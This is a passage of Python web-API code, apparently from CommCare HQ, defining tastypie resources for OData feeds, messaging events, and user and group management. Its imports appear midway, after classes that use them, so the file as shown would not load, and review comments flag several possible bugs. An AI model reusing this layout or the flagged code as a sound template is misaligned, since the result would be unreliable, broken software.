                app.name, entry['module'].default_name(), entry['form'].default_name())
            forms.append(Form(form_xmlns=entry['form'].xmlns, form_name=display_name))
        return forms
# Zapier needs both an id and a name per object; case types only have a name,
# so `placeholder` stands in for the missing id.
CaseType = namedtuple('CaseType', ['case_type', 'placeholder'])
CaseType.__new__.__defaults__ = ('', '')
class DomainCases(Resource):
    """
    Returns: list of case types for a domain
    Note: only returns case types for which at least one case has been made
    """
    placeholder = fields.CharField(attribute='placeholder')
    case_type = fields.CharField(attribute='case_type')

    class Meta(object):
        resource_name = 'domain_cases'
        authentication = RequirePermissionAuthentication(Permissions.access_api)
        object_class = CaseType
        include_resource_uri = False
        allowed_methods = ['get']
        limit = 100
        max_limit = 1000

    def obj_get_list(self, bundle, **kwargs):
        # Elasticsearch only knows about case types that have actual cases.
        found_types = get_case_types_for_domain_es(kwargs['domain'])
        return [CaseType(case_type=name) for name in found_types]
# (user_id, user_name) pair; both default to the empty string.
UserInfo = namedtuple('UserInfo', ['user_id', 'user_name'])
UserInfo.__new__.__defaults__ = ('', '')
class DomainUsernames(Resource):
    """
    Returns: list of usernames for a domain.
    """
    user_id = fields.CharField(attribute='user_id')
    user_name = fields.CharField(attribute='user_name')

    class Meta(object):
        resource_name = 'domain_usernames'
        authentication = RequirePermissionAuthentication(Permissions.view_commcare_users)
        object_class = User
        include_resource_uri = False
        allowed_methods = ['get']

    def obj_get_list(self, bundle, **kwargs):
        id_name_pairs = get_all_user_id_username_pairs_by_domain(kwargs['domain'])
        # Strip the @domain.commcarehq.org suffix for display.
        return [
            UserInfo(user_id=user_id, user_name=raw_username(username))
            for user_id, username in id_name_pairs
        ]
class BaseODataResource(HqBaseResource, DomainSpecificResourceMixin):
    """Shared plumbing for the OData case/form feeds: privilege gating,
    export-config capture, and OData response headers."""

    # NOTE(review): these are assigned per-request in dispatch() but live on
    # the resource instance; if tastypie shares one instance across requests
    # this looks racy under concurrency — confirm instantiation model.
    config_id = None
    table_id = None

    def dispatch(self, request_type, request, **kwargs):
        """Gate on the ODATA_FEED privilege, then time and record the access."""
        if not domain_has_privilege(request.domain, privileges.ODATA_FEED):
            raise ImmediateHttpResponse(
                response=HttpResponseNotFound('Feature flag not enabled.')
            )
        self.config_id = kwargs['config_id']
        # table_id is optional in the URL; default to the first table.
        self.table_id = int(kwargs.get('table_id', 0))
        with TimingContext() as timer:
            response = super(BaseODataResource, self).dispatch(
                request_type, request, **kwargs
            )
        record_feed_access_in_datadog(request, self.config_id, timer.duration, response)
        return response

    def create_response(self, request, data, response_class=HttpResponse,
                        **response_kwargs):
        # Enrich the payload with the context the OData serializer needs to
        # build metadata URLs, then attach OData headers to the response.
        data['domain'] = request.domain
        data['config_id'] = self.config_id
        data['api_path'] = request.path
        data['table_id'] = self.table_id
        response = super(BaseODataResource, self).create_response(
            request, data, response_class, **response_kwargs)
        return add_odata_headers(response)

    def detail_uri_kwargs(self, bundle_or_obj):
        # Not sure why this is required but the feed 500s without it
        return {
            'pk': get_obj(bundle_or_obj)['_id']
        }

    def determine_format(self, request):
        # Results should be sent as JSON
        return 'application/json'
@location_safe
class ODataCaseResource(BaseODataResource):
    """OData feed over a saved case export configuration."""

    def obj_get_list(self, bundle, domain, **kwargs):
        couch_user = bundle.request.couch_user
        config = get_document_or_404(CaseExportInstance, domain, self.config_id)
        if raise_odata_permissions_issues(couch_user, domain, config):
            raise ImmediateHttpResponse(
                HttpForbidden(ugettext_noop(
                    "You do not have permission to view this feed."
                ))
            )
        query = get_case_export_base_query(domain, config.case_type)
        # Layer the export's saved filters onto the base ES query.
        for export_filter in config.get_filters():
            query = query.filter(export_filter.to_es_filter())
        if not couch_user.has_permission(domain, 'access_all_locations'):
            query = query_location_restricted_cases(query, bundle.request)
        return query

    class Meta(v0_4.CommCareCaseResource.Meta):
        authentication = ODataAuthentication()
        resource_name = 'odata/cases'
        serializer = ODataCaseSerializer()
        limit = 2000
        max_limit = 10000

    def prepend_urls(self):
        # The table-specific pattern must come first so that
        # "<config>/<table>/feed" is not swallowed by "<config>/feed".
        return [
            url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/(?P<table_id>[\d]+)/feed".format(
                self._meta.resource_name), self.wrap_view('dispatch_list')),
            url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/feed".format(
                self._meta.resource_name), self.wrap_view('dispatch_list')),
        ]
@location_safe
class ODataFormResource(BaseODataResource):
    """OData feed over a saved form export configuration."""

    def obj_get_list(self, bundle, domain, **kwargs):
        couch_user = bundle.request.couch_user
        config = get_document_or_404(FormExportInstance, domain, self.config_id)
        if raise_odata_permissions_issues(couch_user, domain, config):
            raise ImmediateHttpResponse(
                HttpForbidden(ugettext_noop(
                    "You do not have permission to view this feed."
                ))
            )
        query = get_form_export_base_query(domain, config.app_id, config.xmlns, include_errors=False)
        # Layer the export's saved filters onto the base ES query.
        for export_filter in config.get_filters():
            query = query.filter(export_filter.to_es_filter())
        if not couch_user.has_permission(domain, 'access_all_locations'):
            query = query_location_restricted_forms(query, bundle.request)
        return query

    class Meta(v0_4.XFormInstanceResource.Meta):
        authentication = ODataAuthentication()
        resource_name = 'odata/forms'
        serializer = ODataFormSerializer()
        limit = 2000
        max_limit = 10000

    def prepend_urls(self):
        # The table-specific pattern must come first so that
        # "<config>/<table>/feed" is not swallowed by "<config>/feed".
        return [
            url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/(?P<table_id>[\d]+)/feed".format(
                self._meta.resource_name), self.wrap_view('dispatch_list')),
            url(r"^(?P<resource_name>{})/(?P<config_id>[\w\d_.-]+)/feed".format(
                self._meta.resource_name), self.wrap_view('dispatch_list')),
        ]
class MessagingEventResourceNew(HqBaseResource, ModelResource):
    """Messaging event API backed by MessagingSubEvent rows, with the parent
    MessagingEvent's source and domain folded into each record."""

    # Computed payload sections, filled in by the dehydrate_* methods below.
    source = fields.DictField()
    recipient = fields.DictField()
    form = fields.DictField()
    error = fields.DictField()
    messages = fields.ListField()

    def dehydrate(self, bundle):
        # The domain lives on the parent MessagingEvent, not the subevent.
        bundle.data["domain"] = bundle.obj.parent.domain
        return bundle

    def dehydrate_status(self, bundle):
        """Prefer the survey session's status for completed survey events."""
        event = bundle.obj
        if event.status == MessagingEvent.STATUS_COMPLETED and event.xforms_session_id:
            return event.xforms_session.status_api
        return MessagingEvent.STATUS_SLUGS.get(event.status, 'unknown')

    def dehydrate_content_type(self, bundle):
        return MessagingEvent.CONTENT_TYPE_SLUGS.get(bundle.obj.content_type, "unknown")

    def dehydrate_source(self, bundle):
        """Describe what triggered this event (read from the parent event)."""
        parent = bundle.obj.parent
        return {
            "id": parent.source_id,
            "type": MessagingEvent.SOURCE_SLUGS.get(parent.source, 'unknown'),
            "display": get_event_display_api(parent),
        }

    def dehydrate_recipient(self, bundle):
        """Resolve the recipient id to a human-readable case or user name."""
        display_value = None
        if bundle.obj.recipient_id:
            display_value = case_or_user_id_to_name(bundle.obj.recipient_id, {
                "couch_recipient_doc_type": bundle.obj.get_recipient_doc_type()
            })
        return {
            "id": bundle.obj.recipient_id,
            "type": MessagingSubEvent.RECIPIENT_SLUGS.get(bundle.obj.recipient_type, "unknown"),
            "display": display_value or "unknown",
        }

    def dehydrate_form(self, bundle):
        """Survey events only: identify the app form and any submission."""
        event = bundle.obj
        if event.content_type not in (MessagingEvent.CONTENT_SMS_SURVEY, MessagingEvent.CONTENT_IVR_SURVEY):
            return None
        submission_id = None
        if event.xforms_session_id:
            submission_id = event.xforms_session.submission_id
        return {
            "app_id": bundle.obj.app_id,
            "form_unique_id": bundle.obj.form_unique_id,
            "form_name": bundle.obj.form_name,
            "form_submission_id": submission_id,
        }

    def dehydrate_error(self, bundle):
        """Return error details, or None for events without an error code."""
        event = bundle.obj
        if not event.error_code:
            return None
        return {
            "code": event.error_code,
            "message": MessagingEvent.ERROR_MESSAGES.get(event.error_code, None),
            "message_detail": event.additional_error_text
        }

    def dehydrate_messages(self, bundle):
        """Dispatch to the content-type specific message listing helper."""
        event = bundle.obj
        if event.content_type == MessagingEvent.CONTENT_EMAIL:
            return self._get_messages_for_email(event)
        if event.content_type in (MessagingEvent.CONTENT_SMS, MessagingEvent.CONTENT_SMS_CALLBACK):
            return self._get_messages_for_sms(event)
        if event.content_type in (MessagingEvent.CONTENT_SMS_SURVEY, MessagingEvent.CONTENT_IVR_SURVEY):
            return self._get_messages_for_survey(event)
        return []  # see corehq.apps.reports.standard.sms.MessageEventDetailReport.rows

    def _get_messages_for_email(self, event):
        """Return the single email message dict ('-' placeholders when the
        Email row is missing)."""
        try:
            email = Email.objects.get(messaging_subevent=event.pk)
            content = email.body
            recipient_address = email.recipient_address
        except Email.DoesNotExist:
            content = '-'
            recipient_address = '-'
        return [{
            "date": event.date,
            "type": "email",
            "direction": "outgoing",
            "content": content,
            "status": MessagingEvent.STATUS_SLUGS.get(event.status, 'unknown'),
            "backend": "email",
            "contact": recipient_address
        }]

    def _get_messages_for_sms(self, event):
        messages = SMS.objects.filter(messaging_subevent_id=event.pk)
        return self._get_message_dicts_for_sms(event, messages, "sms")

    def _get_messages_for_survey(self, event):
        """List the SMS/IVR exchanges belonging to the event's survey session."""
        if not event.xforms_session_id:
            return []
        xforms_session = event.xforms_session
        if not xforms_session:
            return []
        messages = SMS.objects.filter(xforms_session_couch_id=xforms_session.couch_id)
        type_ = "ivr" if event.content_type == MessagingEvent.CONTENT_IVR_SURVEY else "sms"
        return self._get_message_dicts_for_sms(event, messages, type_)

    def _get_message_dicts_for_sms(self, event, messages, type_):
        message_dicts = []
        for sms in messages:
            if event.status != MessagingEvent.STATUS_ERROR:
                status, _ = get_sms_status_display_raw(sms)
            else:
                # An errored event overrides the per-message status.
                status = MessagingEvent.STATUS_SLUGS.get(event.status, "unknown")
            message_dicts.append({
                "date": sms.date,
                "type": type_,
                "direction": SMS.DIRECTION_SLUGS.get(sms.direction, "unknown"),
                "content": sms.text,
                "status": status,
                "backend": get_backend_name(sms.backend_id) or sms.backend_id,
                "contact": sms.phone_number
            })
        return message_dicts

    def build_filters(self, filters=None, **kwargs):
        # Custom filtering for date etc
        # see corehq.apps.reports.standard.sms.MessagingEventsReport.get_filters
        return super(MessagingEventResourceNew, self).build_filters(filters, **kwargs)

    class Meta(object):
        queryset = MessagingSubEvent.objects.all()
        include_resource_uri = False
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
        resource_name = 'messaging-event'
        authentication = RequirePermissionAuthentication(Permissions.edit_data)
        authorization = DomainAuthorization('parent__domain')
        paginator_class = NoCountingPaginator
        # Raw columns hidden because they are surfaced via the computed
        # `form`, `error`, and `recipient` sections above.
        excludes = {
            "error_code",
            "additional_error_text",
            "app_id",
            "form_name",
            "form_unique_id",
            "recipient_id",
            "recipient_type",
        }
        filtering = {
            # this is needed for the domain filtering but any values passed in via the URL get overridden
            "domain": ('exact',),
            "date": ('exact', 'gt', 'gte', 'lt', 'lte', 'range'),
            # "source": ('exact',),  # TODO
            "content_type": ('exact',),
            "status": ('exact',),
            "error_code": ('exact',),
            "case_id": ('exact',),
            # "contact": ('exact',),  # TODO
            # "parent": ('exact',),  # TODO
        }
        ordering = [
            'date',
        ]
class MessagingEventResource(HqBaseResource, ModelResource):
    """Messaging event API backed by parent MessagingEvent rows; served at
    'messaging-event-old' (presumably kept for backwards compatibility with
    MessagingEventResourceNew — confirm deprecation status)."""

    # Human-readable variants of the model's coded fields, via Django's
    # auto-generated get_FOO_display methods.
    content_type_display = fields.CharField(attribute='get_content_type_display')
    recipient_type_display = fields.CharField(attribute='get_recipient_type_display')
    status_display = fields.CharField(attribute='get_status_display')
    source_display = fields.CharField(attribute='get_source_display')

    class Meta(object):
        queryset = MessagingEvent.objects.all()
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
        resource_name = 'messaging-event-old'
        authentication = RequirePermissionAuthentication(Permissions.edit_data)
        authorization = DomainAuthorization()
        paginator_class = NoCountingPaginator
        filtering = {
            # this is needed for the domain filtering but any values passed in via the URL get overridden
            "domain": ('exact',),
            "date": ('exact', 'gt', 'gte', 'lt', 'lte', 'range'),
            "source": ('exact',),
            "content_type": ('exact',),
            "status": ('exact',),
        }
        ordering = [
            'date',
        ]
# TODO: add todos
from collections import namedtuple
from itertools import chain
from django.conf.urls import url
from django.contrib.auth.models import User
from django.forms import ValidationError
from django.http import Http404, HttpResponse, HttpResponseNotFound
from django.urls import reverse
from django.utils.translation import ugettext_noop
from memoized import memoized_property
from tastypie import fields, http
from tastypie.authorization import ReadOnlyAuthorization
from tastypie.bundle import Bundle
from tastypie.exceptions import BadRequest, ImmediateHttpResponse, NotFound
from tastypie.http import HttpForbidden, HttpUnauthorized
from tastypie.resources import ModelResource, Resource, convert_post_to_patch
from tastypie.utils import dict_strip_unicode_keys
from casexml.apps.stock.models import StockTransaction
from corehq.apps.api.resources.serializers import ListToSingleObjectSerializer
from corehq.apps.sms.models import MessagingEvent, MessagingSubEvent, Email, SMS
from phonelog.models import DeviceReportEntry
from corehq import privileges
from corehq.apps.accounting.utils import domain_has_privilege
from corehq.apps.api.odata.serializers import (
ODataCaseSerializer,
ODataFormSerializer,
)
from corehq.apps.api.odata.utils import record_feed_access_in_datadog
from corehq.apps.api.odata.views import (
add_odata_headers,
raise_odata_permissions_issues,
)
from corehq.apps.api.resources.auth import (
AdminAuthentication,
ODataAuthentication,
RequirePermissionAuthentication,
LoginAuthentication)
from corehq.apps.api.resources.meta import CustomResourceMeta
from corehq.apps.api.util import get_obj
from corehq.apps.app_manager.models import Application
from corehq.apps.domain.forms import clean_password
from corehq.apps.domain.models import Domain
from corehq.apps.es import UserES
from corehq.apps.export.esaccessors import (
get_case_export_base_query,
get_form_export_base_query,
)
from corehq.apps.export.models import CaseExportInstance, FormExportInstance
from corehq.apps.export.transforms import case_or_user_id_to_name
from corehq.apps.groups.models import Group
from corehq.apps.locations.permissions import location_safe
from corehq.apps.reports.analytics.esaccessors import (
get_case_types_for_domain_es,
)
from corehq.apps.reports.standard.cases.utils import (
query_location_restricted_cases,
query_location_restricted_forms,
)
from corehq.apps.reports.standard.message_event_display import get_event_display_api, get_sms_status_display_raw
from corehq.apps.sms.util import strip_plus, get_backend_name
from corehq.apps.userreports.columns import UCRExpandDatabaseSubcolumn
from corehq.apps.userreports.models import (
ReportConfiguration,
StaticReportConfiguration,
report_config_id_is_static,
)
from corehq.apps.userreports.reports.data_source import (
ConfigurableReportDataSource,
)
from corehq.apps.userreports.reports.view import (
get_filter_values,
query_dict_to_dict,
)
from corehq.apps.users.dbaccessors import (
get_all_user_id_username_pairs_by_domain,
)
from corehq.apps.users.models import (
CommCareUser,
CouchUser,
Permissions,
SQLUserRole,
WebUser,
)
from corehq.apps.users.util import raw_username
from corehq.const import USER_CHANGE_VIA_API
from corehq.util import get_document_or_404
from corehq.util.couch import DocumentNotFound, get_document_or_not_found
from corehq.util.model_log import ModelAction, log_model_change
from corehq.util.timer import TimingContext
from . import (
CouchResourceMixin,
DomainSpecificResourceMixin,
HqBaseResource,
v0_1,
v0_4,
CorsResourceMixin)
from .pagination import DoesNothingPaginator, NoCountingPaginator
# Test hook: when set, BulkUserResource calls this instead of Elasticsearch.
MOCK_BULK_USER_ES = None


def user_es_call(domain, q, fields, size, start_at):
    """Run a UserES query for ``domain`` and return the raw hit dicts."""
    query = UserES().domain(domain).fields(fields).size(size).start(start_at)
    if q is not None:
        # Free-text query-string search across user documents.
        query.set_query({"query_string": {"query": q}})
    return query.run().hits
def _set_role_for_bundle(kwargs, bundle):
    """Assign the named role to bundle.obj for the domain, or raise BadRequest."""
    domain = kwargs['domain']
    role_name = bundle.data.get('role')
    matching_roles = SQLUserRole.objects.by_domain_and_name(domain, role_name)
    if not matching_roles:
        raise BadRequest(f"Invalid User Role '{role_name}'")
    # Role names are not unique within a domain; take the first match.
    bundle.obj.set_role(domain, matching_roles[0].get_qualified_id())
class BulkUserResource(HqBaseResource, DomainSpecificResourceMixin):
    """
    A read-only user data resource based on elasticsearch.
    Supported Params: limit offset q fields
    """
    type = "bulk-user"
    id = fields.CharField(attribute='id', readonly=True, unique=True)
    email = fields.CharField(attribute='email')
    username = fields.CharField(attribute='username', unique=True)
    first_name = fields.CharField(attribute='first_name', null=True)
    last_name = fields.CharField(attribute='last_name', null=True)
    phone_numbers = fields.ListField(attribute='phone_numbers', null=True)

    @staticmethod
    def to_obj(user):
        """Turn a flat ES hit dict into an attribute-access object,
        renaming the ES '_id' key to 'id'."""
        if '_id' in user:
            user['id'] = user.pop('_id')
        return namedtuple('user', list(user))(**user)

    class Meta(CustomResourceMeta):
        authentication = RequirePermissionAuthentication(Permissions.edit_commcare_users)
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
        object_class = object
        resource_name = 'bulk-user'

    def dehydrate(self, bundle):
        """Trim the response to the fields the caller asked for, if any."""
        # Renamed from `fields` to avoid shadowing the module-level
        # `tastypie.fields` import.
        requested_fields = bundle.request.GET.getlist('fields')
        if not requested_fields:
            return bundle
        bundle.data = {field: bundle.data[field] for field in requested_fields}
        return bundle

    def obj_get_list(self, bundle, **kwargs):
        """Query ES (or the mock hook) and return user objects for the domain."""
        request_fields = bundle.request.GET.getlist('fields')
        for field in request_fields:
            if field not in self.fields:
                raise BadRequest('{0} is not a valid field'.format(field))
        params = bundle.request.GET
        # ES stores the document id as '_id'; ask for that instead of 'id'.
        es_fields = list(self.fields)
        es_fields.remove('id')
        es_fields.append('_id')
        fn = MOCK_BULK_USER_ES or user_es_call
        users = fn(
            domain=kwargs['domain'],
            q=params.get('q', None),
            fields=es_fields,
            size=params.get('limit', None),
            start_at=params.get('offset', None),
        )
        return list(map(self.to_obj, users))

    def detail_uri_kwargs(self, bundle_or_obj):
        return {
            'pk': get_obj(bundle_or_obj).id
        }
class CommCareUserResource(v0_1.CommCareUserResource):
    """Read/write API for mobile workers (CommCareUser documents)."""

    class Meta(v0_1.CommCareUserResource.Meta):
        detail_allowed_methods = ['get', 'put', 'delete']
        list_allowed_methods = ['get', 'post']
        always_return_data = True

    def serialize(self, request, data, format, options=None):
        # On POST, reduce the response payload to just the new user's id.
        if not isinstance(data, dict) and request.method == 'POST':
            data = {'id': data.obj._id}
        return self._meta.serializer.serialize(data, format, options)

    def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
        """Build a domain-qualified detail URI for a bundle or bare user object."""
        if bundle_or_obj is None:
            return super(CommCareUserResource, self).get_resource_uri(bundle_or_obj, url_name)
        elif isinstance(bundle_or_obj, Bundle):
            obj = bundle_or_obj.obj
        else:
            obj = bundle_or_obj
        return reverse('api_dispatch_detail', kwargs=dict(resource_name=self._meta.resource_name,
                                                          domain=obj.domain,
                                                          api_name=self._meta.api_name,
                                                          pk=obj._id))

    def _update(self, bundle):
        """Apply bundle.data onto bundle.obj field by field.

        Returns True when at least one change needs saving. On password
        validation failure it records the message on bundle.obj.errors and
        returns False.
        """
        should_save = False
        for key, value in bundle.data.items():
            if getattr(bundle.obj, key, None) != value:
                if key == 'phone_numbers':
                    # Replace the whole list; the first number becomes default.
                    bundle.obj.phone_numbers = []
                    for idx, phone_number in enumerate(bundle.data.get('phone_numbers', [])):
                        bundle.obj.add_phone_number(strip_plus(phone_number))
                        if idx == 0:
                            bundle.obj.set_default_phone_number(strip_plus(phone_number))
                        should_save = True
                elif key == 'groups':
                    bundle.obj.set_groups(bundle.data.get("groups", []))
                    should_save = True
                elif key in ['email', 'username']:
                    # Normalize to lowercase like obj_create does.
                    setattr(bundle.obj, key, value.lower())
                    should_save = True
                elif key == 'password':
                    # Enforce the project's password policy when enabled.
                    domain = Domain.get_by_name(bundle.obj.domain)
                    if domain.strong_mobile_passwords:
                        try:
                            clean_password(bundle.data.get("password"))
                        except ValidationError as e:
                            if not hasattr(bundle.obj, 'errors'):
                                bundle.obj.errors = []
                            bundle.obj.errors.append(str(e))
                            return False
                    bundle.obj.set_password(bundle.data.get("password"))
                    should_save = True
                elif key == 'user_data':
                    try:
                        bundle.obj.update_metadata(value)
                    except ValueError as e:
                        raise BadRequest(str(e))
                else:
                    setattr(bundle.obj, key, value)
                    should_save = True
        return should_save

    def obj_create(self, bundle, **kwargs):
        """Create the user; on any failure, roll back both the couch document
        and the mirrored django user before re-raising."""
        try:
            bundle.obj = CommCareUser.create(
                domain=kwargs['domain'],
                username=bundle.data['username'].lower(),
                password=bundle.data['password'],
                created_by=bundle.request.user,
                created_via=USER_CHANGE_VIA_API,
                email=bundle.data.get('email', '').lower(),
            )
            # Don't let _update() treat the password as a plain field change.
            del bundle.data['password']
            self._update(bundle)
            bundle.obj.save()
        except Exception:
            if bundle.obj._id:
                bundle.obj.retire(deleted_by=bundle.request.user, deleted_via=USER_CHANGE_VIA_API)
            try:
                django_user = bundle.obj.get_django_user()
            except User.DoesNotExist:
                pass
            else:
                django_user.delete()
                log_model_change(bundle.request.user, django_user, message=f"deleted_via: {USER_CHANGE_VIA_API}",
                                 action=ModelAction.DELETE)
            raise
        return bundle

    def obj_update(self, bundle, **kwargs):
        """Update the user; surfaces _update()'s collected errors as BadRequest."""
        bundle.obj = CommCareUser.get(kwargs['pk'])
        assert bundle.obj.domain == kwargs['domain']
        if self._update(bundle):
            assert bundle.obj.domain == kwargs['domain']
            bundle.obj.save()
            return bundle
        else:
            raise BadRequest(''.join(chain.from_iterable(bundle.obj.errors)))

    def obj_delete(self, bundle, **kwargs):
        # NOTE(review): retire() is a soft delete. The `if user:` guard looks
        # moot if CommCareUser.get raises for missing docs — confirm.
        user = CommCareUser.get(kwargs['pk'])
        if user:
            user.retire(deleted_by=bundle.request.user, deleted_via=USER_CHANGE_VIA_API)
        return ImmediateHttpResponse(response=http.HttpAccepted())
class WebUserResource(v0_1.WebUserResource):
    """Read/write API for web users, including role assignment."""

    class Meta(v0_1.WebUserResource.Meta):
        detail_allowed_methods = ['get', 'put', 'delete']
        list_allowed_methods = ['get', 'post']
        always_return_data = True

    def serialize(self, request, data, format, options=None):
        # On POST, reduce the response payload to just the new user's id.
        if not isinstance(data, dict) and request.method == 'POST':
            data = {'id': data.obj._id}
        return self._meta.serializer.serialize(data, format, options)

    def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
        # NOTE(review): if bundle_or_obj is neither a Bundle nor None (e.g. a
        # bare WebUser), `domain` and `obj` are never bound and the reverse()
        # below raises NameError — compare CommCareUserResource, which handles
        # that case. Confirm whether bare objects ever reach here.
        if isinstance(bundle_or_obj, Bundle):
            domain = bundle_or_obj.request.domain
            obj = bundle_or_obj.obj
        elif bundle_or_obj is None:
            return None
        return reverse('api_dispatch_detail', kwargs=dict(resource_name=self._meta.resource_name,
                                                          domain=domain,
                                                          api_name=self._meta.api_name,
                                                          pk=obj._id))

    def _validate(self, bundle):
        """Reject inconsistent is_admin/role combinations up front."""
        if bundle.data.get('is_admin', False):
            # default value Admin since that will be assigned later anyway since is_admin is True
            if bundle.data.get('role', 'Admin') != 'Admin':
                raise BadRequest("An admin can have only one role : Admin")
        else:
            if not bundle.data.get('role', None):
                raise BadRequest("Please assign role for non admin user")

    def _update(self, bundle):
        """Apply bundle.data onto bundle.obj; returns True when a save is needed.

        The 'role' key is deliberately skipped here — see _set_role_for_bundle.
        """
        should_save = False
        for key, value in bundle.data.items():
            if key == "role":
                # role handled in _set_role_for_bundle
                continue
            if getattr(bundle.obj, key, None) != value:
                if key == 'phone_numbers':
                    # Replace the whole list; the first number becomes default.
                    bundle.obj.phone_numbers = []
                    for idx, phone_number in enumerate(bundle.data.get('phone_numbers', [])):
                        bundle.obj.add_phone_number(strip_plus(phone_number))
                        if idx == 0:
                            bundle.obj.set_default_phone_number(strip_plus(phone_number))
                        should_save = True
                elif key in ['email', 'username']:
                    setattr(bundle.obj, key, value.lower())
                    should_save = True
                else:
                    setattr(bundle.obj, key, value)
                    should_save = True
        return should_save

    def obj_create(self, bundle, **kwargs):
        """Create the web user; on failure, roll back the couch document or
        the mirrored django user before re-raising."""
        self._validate(bundle)
        try:
            self._meta.domain = kwargs['domain']
            bundle.obj = WebUser.create(
                domain=kwargs['domain'],
                username=bundle.data['username'].lower(),
                password=bundle.data['password'],
                created_by=bundle.request.user,
                created_via=USER_CHANGE_VIA_API,
                email=bundle.data.get('email', '').lower(),
                is_admin=bundle.data.get('is_admin', False)
            )
            # Don't let _update() treat the password as a plain field change.
            del bundle.data['password']
            self._update(bundle)
            # is_admin takes priority over role
            if not bundle.obj.is_admin and bundle.data.get('role'):
                _set_role_for_bundle(kwargs, bundle)
            bundle.obj.save()
        except Exception:
            if bundle.obj._id:
                bundle.obj.delete(deleted_by=bundle.request.user, deleted_via=USER_CHANGE_VIA_API)
            else:
                try:
                    django_user = bundle.obj.get_django_user()
                except User.DoesNotExist:
                    pass
                else:
                    django_user.delete()
                    log_model_change(bundle.request.user, django_user, message=f"deleted_via: {USER_CHANGE_VIA_API}",
                                     action=ModelAction.DELETE)
            raise
        return bundle

    def obj_update(self, bundle, **kwargs):
        """Update the web user; the user must belong to the URL's domain."""
        self._validate(bundle)
        bundle.obj = WebUser.get(kwargs['pk'])
        assert kwargs['domain'] in bundle.obj.domains
        if self._update(bundle):
            # Re-check membership in case _update() changed the domains list.
            assert kwargs['domain'] in bundle.obj.domains
            bundle.obj.save()
        return bundle
class AdminWebUserResource(v0_1.UserResource):
    """Read-only, admin-authenticated lookup and listing of web users."""

    domains = fields.ListField(attribute='domains')

    def obj_get(self, bundle, **kwargs):
        return WebUser.get(kwargs['pk'])

    def obj_get_list(self, bundle, **kwargs):
        if 'username' in bundle.request.GET:
            user = WebUser.get_by_username(bundle.request.GET['username'])
            # Bug fix: get_by_username returns None for an unknown username;
            # previously that produced a [None] result list.
            return [user] if user else []
        return [WebUser.wrap(u) for u in UserES().web_users().run().hits]

    class Meta(WebUserResource.Meta):
        authentication = AdminAuthentication()
        detail_allowed_methods = ['get']
        list_allowed_methods = ['get']
class GroupResource(v0_4.GroupResource):
    """Group API supporting read, create, update, delete and bulk-create (PATCH)."""

    class Meta(v0_4.GroupResource.Meta):
        detail_allowed_methods = ['get', 'put', 'delete']
        list_allowed_methods = ['get', 'post', 'patch']
        always_return_data = True

    def serialize(self, request, data, format, options=None):
        # Collapse non-dict payloads to either the error message or, for
        # creates, just the new document id.
        # NOTE(review): assumes a non-dict `data` has a `.data` attribute (a
        # Bundle); a plain list (e.g. patch_list's to_be_serialized) would
        # raise AttributeError here -- confirm against actual call paths.
        if not isinstance(data, dict):
            if 'error_message' in data.data:
                data = {'error_message': data.data['error_message']}
            elif request.method == 'POST':
                data = {'id': data.obj._id}
        return self._meta.serializer.serialize(data, format, options)

    def patch_list(self, request=None, **kwargs):
        """
        Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.14/tastypie/resources.py#L1466
        (BSD licensed) and modified to pass the kwargs to `obj_create` and support only create method
        """
        request = convert_post_to_patch(request)
        deserialized = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))

        collection_name = self._meta.collection_name
        if collection_name not in deserialized:
            raise BadRequest("Invalid data sent: missing '%s'" % collection_name)

        if len(deserialized[collection_name]) and 'put' not in self._meta.detail_allowed_methods:
            raise ImmediateHttpResponse(response=http.HttpMethodNotAllowed())

        bundles_seen = []
        status = http.HttpAccepted
        for data in deserialized[collection_name]:
            data = self.alter_deserialized_detail_data(request, data)
            bundle = self.build_bundle(data=dict_strip_unicode_keys(data), request=request)
            try:
                self.obj_create(bundle=bundle, **self.remove_api_resource_names(kwargs))
            except AssertionError as e:
                # A failed create downgrades the whole response status and
                # records the reason in place of the id.
                status = http.HttpBadRequest
                bundle.data['_id'] = str(e)
            bundles_seen.append(bundle)

        # NOTE(review): successful creates rely on bundle.data['_id'] being
        # populated during obj_create/hydration -- verify.
        to_be_serialized = [bundle.data['_id'] for bundle in bundles_seen]
        return self.create_response(request, to_be_serialized, response_class=status)

    def post_list(self, request, **kwargs):
        """
        Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.14/tastypie/resources.py#L1314
        (BSD licensed) and modified to catch Exception and not returning traceback
        """
        deserialized = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))
        deserialized = self.alter_deserialized_detail_data(request, deserialized)
        bundle = self.build_bundle(data=dict_strip_unicode_keys(deserialized), request=request)
        try:
            updated_bundle = self.obj_create(bundle, **self.remove_api_resource_names(kwargs))
            location = self.get_resource_uri(updated_bundle)

            if not self._meta.always_return_data:
                return http.HttpCreated(location=location)
            else:
                updated_bundle = self.full_dehydrate(updated_bundle)
                updated_bundle = self.alter_detail_data_to_serialize(request, updated_bundle)
                return self.create_response(request, updated_bundle, response_class=http.HttpCreated, location=location)
        except AssertionError as e:
            # Duplicate-name creates raise AssertionError; surface the
            # message as a 400 instead of a traceback.
            bundle.data['error_message'] = str(e)
            return self.create_response(request, bundle, response_class=http.HttpBadRequest)

    def _update(self, bundle):
        """Apply changed fields from bundle.data to the group.

        Returns True when something changed and the caller should save.
        Raises when the new name is already taken within the domain.
        """
        should_save = False
        for key, value in bundle.data.items():
            if key == 'name' and getattr(bundle.obj, key, None) != value:
                # Group names must stay unique per domain.
                if not Group.by_name(bundle.obj.domain, value):
                    setattr(bundle.obj, key, value or '')
                    should_save = True
                else:
                    raise Exception("A group with this name already exists")
            if key == 'users' and getattr(bundle.obj, key, None) != value:
                # Diff the membership lists and apply adds/removes.
                users_to_add = set(value) - set(bundle.obj.users)
                users_to_remove = set(bundle.obj.users) - set(value)
                for user in users_to_add:
                    bundle.obj.add_user(user)
                    should_save = True
                for user in users_to_remove:
                    bundle.obj.remove_user(user)
                    should_save = True
            elif getattr(bundle.obj, key, None) != value:
